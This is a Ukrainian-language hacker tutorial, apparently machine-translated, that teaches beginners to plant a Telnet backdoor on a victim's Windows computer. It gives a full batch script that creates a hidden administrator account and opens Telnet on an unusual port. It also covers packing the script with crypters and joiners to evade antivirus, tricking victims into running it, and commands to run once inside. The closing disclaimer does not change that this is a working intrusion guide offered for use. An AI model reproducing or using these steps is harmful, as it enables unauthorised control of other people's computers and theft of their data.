Всім привіт! Все більше і більше я бачу, як новачки задають одні і ті ж питання на форумі, в чаті, в аськах, такі як: Що таке телнет? Як ним користуватися? Навіщо він потрібен? Тому я вирішив в допомогу їм написати цю статтю. У цій статті я спробую пояснити за допомогою такого універсального сервісу, як телнет, можна проникнути в файлову систему віддаленого по мережі компа, і повністю керувати ним, віддаючи команди. Але перш ніж діяти давайте дізнаємося, що за така служба телнет.

Телнет — мережевий протокол для роботи у віддаленій системі в термінальному
режимі(тобто режимі командного рядка). Все робиться «ручками», миші відпочивають, лише текстовий обмін інформацією. Він один з найважливіших засобів, користуватися яким повинен навчитися кожен хакер перш, ніж він подумає про злом серверів. Цей протокол може бути використаний для підключення до віддалених комп’ютерів і запуску програм з командного рядка, просто вводячи команди в GUI вікні. Telnet не використовує ресурси клієнтської машини, але він використовує ресурси сервера, з яким з’єднався клієнт. В основному це програма, эмулирующая термінал,
що дозволяє нам підключатися до віддалених комп’ютерів.

Ну а тепер як ви вже напевно здогадалися цю службу і необхідно відкривати у
жертви. Буває таке, що цей сервіс буде важити у «ворога», але при спроби
підключиться 90% того, що він вимагатиме пас, можна звичайно спробувати брут,
але ймовірність успіху дуже маленька. Для злому можна скористатися таким
методом як соціальна інженерія(СІ). Я думаю не треба пояснювати що це таке.
Якщо ви думаєте, що СІ ніяк не відноситься до хакерства то ви помиляєтеся, цей
метод в даному випадку найбільш актуальне.
Для того, щоб відкрити телнет, жертві необхідно буде запустити створений
тобою файл, який їй можна подарувати. При запуску він пропишит потрібний тобі
порт, на якому буде висіти телнет, потрібний логін і пасс. Його можна запросто
написати на мові Php, тобто мова команд в GUI вікні в середовищі Windows(режим командного
рядки).
тіло батника:

chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Адміністратори hacker /add
net localgroup Користувачі SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet

все це пишеш в блокноті, і зберігаємо як *.bat

Тепер пояснення:
chcp 1251 – змінює кодування на 1251, так як батник написаний не в дос кодуванні.
net user SUPPORT_388945a0 /delete
net localgroup Користувачі SUPPORT_388945a0 /del — видаляють стандартну
первісну виндосовскую учетку, яка є в xp prof і в 2003 server.
net user hacker hack /add і
net localgroup Адміністратори hacker /add — не важко здогадатися, що цими
командами створюється новий обліковий запис з админскими правами,
де логін: hacker
пас: hack
Так як при створенні нового адміна він буде видний у welcome screen’е, відключити його
можна імпортувати
рег файл реєстру, наступного змісту:
Вміст conf.re
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftwindows
NTCurrentVersionWinlogonSpecialAccountsuserlis t]
«hacker»=dword:00000000
Сервіс телнет за замовчуванням відключений, але є така команда sc config tlntsvr start=
auto яка
змінює тип його запуску на автоматичний(по дефолту disabled ).
При запуску телнета, він ставиться на стандартний свій 23-ій порт, але на жаль це
палевно, тому раджу прописувати цією командою tlntadmn config port=972
sec=-NTLM, рідко використовуваний порт. У нашому випадку це 972.
Ну от всі налаштування і конфігурація сервісу завершено, і ця рядок net start Telnet
остаточно запустить наш бекдор.

тепер перевіримо правильний синтаксис коду. Відкриваємо ” командний рядок, якщо
вона загубилася можна знайти її тут c:WINDOWSsystem32cmd.exe. Вставляємо код
запускаємо і дивимося, чи немає помилок. Переконатися що все ок, ще можна так:
Пуск -> Виконати -> пишемо services.msc -> Ok
Там ти бачиш запуск, зупинку і налаштування служб Windows. Вибираєш Telnet, і
дивишся її властивості. При необхідності в будь-який момент її можна відключити.

Ось батник готовий, і як ти бачиш він занадто палевны, при його запуску вилітає
консольне чорне вікно, яке говорить про виконувані процеси в командному рядку. Але
не все так погано, тобі допоможе така прога, як QuickBatchFileCompiler ifolder.ru/7197807. Вона
компілює пакетні bat, cmd – і vb-файли, виконувані *.exe. І батник
перетвориться в прихований *.exe файл, ну прихований звичайно не в прямому сенсі.
Начебто готово… Але не зовсім, ти ж не будеш дарувати порожній экзешник, тому
бери в руки джойнеры і крипторы, якщо немає, не поганий публічний криптор можна
завантажити тут ifolder.ru/7198272 pohernah107(13 кб) а джойнер можеш узяти тут ifolder.ru/7197872
RedBindeR_v1.3_Mod(460 кб). Вони допоможуть тобі склеїти файли в один і змінити
сигнатуру щоб не палітся антивірусами.
Припустимо, жертва повелася на ці виверти і запустила файл. Знаючи IP своєї жертви
тобі залишилося тільки підключиться до телнету через вказаний тобою порт. Буває
так що жертва перебуває в глобальній мережі www у якої IP динамічний, у цьому
випадки, знаючи діапазон IP його провайдера можна просканувати цю мережу на
відкритий наш рідко використовуваний 972 Порт. А щоб знати, коли твій «друг»
в онлайні, може допомогти його авторизована ася, або всім відомий [email protected]
Залишилося підключиться. Для цього можеш вибрати стандартний віндосовскій
клієнт який знаходиться тут c:WINDOWSsystem32telnet.exe.
Запускаєш. Пишеш:
Microsoft Telnet> o 192.168.1.24[IP жертви] 972[порт]
якщо пише:
Welcome to Microsoft Telnet Service
login:_
то все акей =))
Вводиш:
login: hacker
password: hack
З’являється напис:
*=====================================================
Вас вітає Telnet-сервер Microsoft
*=====================================================
C:>_

Вітаю, ти всередині, перед тобою консоль, з допомогою якої ти можеш
керувати кампом, віддаючи команди…
Можна наприклад разшарив диски:

C:>net share disk_c=c: > nul
C:>net share disk_d=d: > nul
C:>net share disk_e=e: > nul

перезавантажити комп:
C:>shutdown -r -t 1 -c -f

прописати який-небудь ключ реєстру:
C:>reg add HKCUSoftwareMicrosoftWindowsCurrentversionpoliciessystem /v
DisableRegistryTools /t REG_DWORD /d 1 /f — який заборонить доступ до нього

або підняти ftp сервер і залити радмина для більш зручного віддаленого
адміністрування:
C:>ftp
Загалом-то, тут вже грає фантазія зломщика =)

Як бачиш, таку службу як Telnet можна недооцінювати, в досвідчених руках хакера це потужна зброя, здатне призвести до несанкціонованого доступу до найдорожчої у наш час інформації. Тому роби висновки, щоб захистити себе в інформаційному світі.

P. S. На всі незрозумілі терміни і вирази є Гугл.

Увага!!! Дана стаття — це не спонукання до дії, все описане тут
потрапляє під дію КК РФ. Я пишу це тільки для ознайомлення і в цілях вашої
інформаційної безпеки